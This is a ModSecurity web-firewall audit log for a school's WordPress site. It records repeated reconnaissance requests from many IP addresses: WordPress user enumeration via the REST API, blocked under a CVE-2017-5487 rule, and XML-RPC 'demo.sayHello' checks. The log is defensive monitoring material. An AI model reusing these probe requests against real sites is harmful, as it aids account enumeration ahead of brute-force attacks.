Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f489138-Z-- --247ca113-A-- [18/May/2025:01:51:58 +0700] aCjazgTOsBn9MSWb6WLnPgAAAIw 103.236.140.4 45930 103.236.140.4 8181 --247ca113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --247ca113-C-- demo.sayHello --247ca113-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --247ca113-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507918549301 4330 (- - -) Stopwatch2: 1747507918549301 4330; combined=2966, p1=446, p2=2342, p3=26, p4=25, p5=73, sr=84, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247ca113-Z-- --8f659775-A-- [18/May/2025:01:56:54 +0700] aCjb9nyxdQCiyU1ENFeyaAAAAAI 103.236.140.4 39714 103.236.140.4 8181 --8f659775-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f659775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f659775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747508214482581 2995 (- - -) Stopwatch2: 1747508214482581 2995; combined=1688, p1=493, p2=1159, p3=0, p4=0, p5=36, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f659775-Z-- --693c6861-A-- [18/May/2025:01:57:01 +0700] aCjb_QTOsBn9MSWb6WLw7QAAAIc 103.236.140.4 40234 103.236.140.4 8181 --693c6861-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --693c6861-C-- demo.sayHello --693c6861-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --693c6861-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747508221023960 10322 (- - -) Stopwatch2: 1747508221023960 10322; combined=8048, p1=1070, p2=6698, p3=47, p4=64, p5=100, sr=101, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --693c6861-Z-- --2fe52741-A-- [18/May/2025:02:31:09 +0700] aCjj_QTOsBn9MSWb6WIubwAAAIU 103.236.140.4 58910 103.236.140.4 8181 --2fe52741-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fe52741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fe52741-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747510269382885 3222 (- - -) Stopwatch2: 1747510269382885 3222; combined=1769, p1=570, p2=1168, p3=0, p4=0, p5=31, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fe52741-Z-- --8cd4143f-A-- [18/May/2025:02:31:17 +0700] aCjkBRKi5m5upc8uMd6EbgAAANM 103.236.140.4 59574 103.236.140.4 8181 --8cd4143f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8cd4143f-C-- demo.sayHello --8cd4143f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cd4143f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747510277495405 4989 (- - -) Stopwatch2: 1747510277495405 4989; combined=3990, p1=528, p2=3253, p3=38, p4=40, p5=78, sr=59, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd4143f-Z-- --4920287f-A-- [18/May/2025:04:21:27 +0700] aCj91xir-GlPrFVVKe4PGQAAAEA 103.236.140.4 53786 103.236.140.4 8181 --4920287f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.134.219.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.134.219.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4920287f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4920287f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747516887083156 3171 (- - -) Stopwatch2: 1747516887083156 3171; combined=1350, p1=453, p2=868, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4920287f-Z-- --fbaf4c13-A-- [18/May/2025:04:29:25 +0700] aCj_tRir-GlPrFVVKe4PIQAAAFg 103.236.140.4 53812 103.236.140.4 8181 --fbaf4c13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fbaf4c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbaf4c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747517365715603 3320 (- - -) Stopwatch2: 1747517365715603 3320; combined=1370, p1=475, p2=861, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbaf4c13-Z-- --0487cd32-A-- [18/May/2025:04:29:33 +0700] aCj_vRir-GlPrFVVKe4PIgAAAFc 103.236.140.4 53822 103.236.140.4 8181 --0487cd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.132 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0487cd32-C-- demo.sayHello --0487cd32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0487cd32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747517373040537 6310 (- - -) Stopwatch2: 1747517373040537 6310; combined=4687, p1=594, p2=3771, p3=35, p4=36, p5=145, sr=123, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0487cd32-Z-- --b6098109-A-- [18/May/2025:05:00:13 +0700] aCkG7Rir-GlPrFVVKe4PTwAAAEE 103.236.140.4 54050 103.236.140.4 8181 --b6098109-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6098109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6098109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747519213465817 3258 (- - -) Stopwatch2: 1747519213465817 3258; combined=1439, p1=504, p2=903, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6098109-Z-- --1289272c-A-- [18/May/2025:05:00:19 +0700] aCkG80PRqak7bVuUS6fYaQAAAI4 103.236.140.4 54056 103.236.140.4 8181 --1289272c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1289272c-C-- demo.sayHello --1289272c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1289272c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747519219567247 7427 (- - -) Stopwatch2: 1747519219567247 7427; combined=5231, p1=723, p2=4236, p3=42, p4=43, p5=109, sr=135, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1289272c-Z-- --613b6769-A-- [18/May/2025:06:40:56 +0700] aCkeiFewLfDrCkDGIGwxrAAAAM8 103.236.140.4 54656 103.236.140.4 8181 --613b6769-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --613b6769-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --613b6769-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747525256257614 3120 (- - -) Stopwatch2: 1747525256257614 3120; combined=1400, p1=465, p2=904, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --613b6769-Z-- --eab89b2c-A-- [18/May/2025:06:41:05 +0700] aCkekUPRqak7bVuUS6ffFgAAAJY 103.236.140.4 55024 103.236.140.4 8181 --eab89b2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eab89b2c-C-- demo.sayHello --eab89b2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab89b2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747525265324913 5689 (- - -) Stopwatch2: 1747525265324913 5689; combined=4189, p1=574, p2=3353, p3=36, p4=39, p5=133, sr=62, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab89b2c-Z-- --a204aa0c-A-- [18/May/2025:07:00:37 +0700] aCkjJUPRqak7bVuUS6fq-wAAAII 103.236.140.4 46296 103.236.140.4 8181 --a204aa0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a204aa0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a204aa0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747526437372381 3431 (- - -) Stopwatch2: 1747526437372381 3431; combined=2075, p1=571, p2=1469, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a204aa0c-Z-- --93b8e70c-A-- [18/May/2025:07:00:42 +0700] aCkjKlewLfDrCkDGIGw9AgAAAM8 103.236.140.4 46536 103.236.140.4 8181 --93b8e70c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93b8e70c-C-- demo.sayHello --93b8e70c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b8e70c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747526442894973 8797 (- - -) Stopwatch2: 1747526442894973 8797; combined=6768, p1=906, p2=5556, p3=53, p4=74, p5=106, sr=73, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b8e70c-Z-- --7a1ffa24-A-- [18/May/2025:07:04:00 +0700] aCkj8Bir-GlPrFVVKe4i8wAAAEw 103.236.140.4 54688 103.236.140.4 8181 --7a1ffa24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a1ffa24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a1ffa24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747526640021315 2304 (- - -) Stopwatch2: 1747526640021315 2304; combined=890, p1=303, p2=565, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a1ffa24-Z-- --0f33f673-A-- [18/May/2025:07:04:08 +0700] aCkj-Bir-GlPrFVVKe4jFgAAAEU 103.236.140.4 55064 103.236.140.4 8181 --0f33f673-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.202 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f33f673-C-- demo.sayHello --0f33f673-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f33f673-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747526648854557 5441 (- - -) Stopwatch2: 1747526648854557 5441; combined=3843, p1=527, p2=3106, p3=31, p4=32, p5=86, sr=105, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f33f673-Z-- --2d54ae3f-A-- [18/May/2025:07:16:46 +0700] aCkm7vypzAd0elWOk7odfQAAAAA 103.236.140.4 54478 103.236.140.4 8181 --2d54ae3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.66.42.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.66.42.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2d54ae3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d54ae3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] 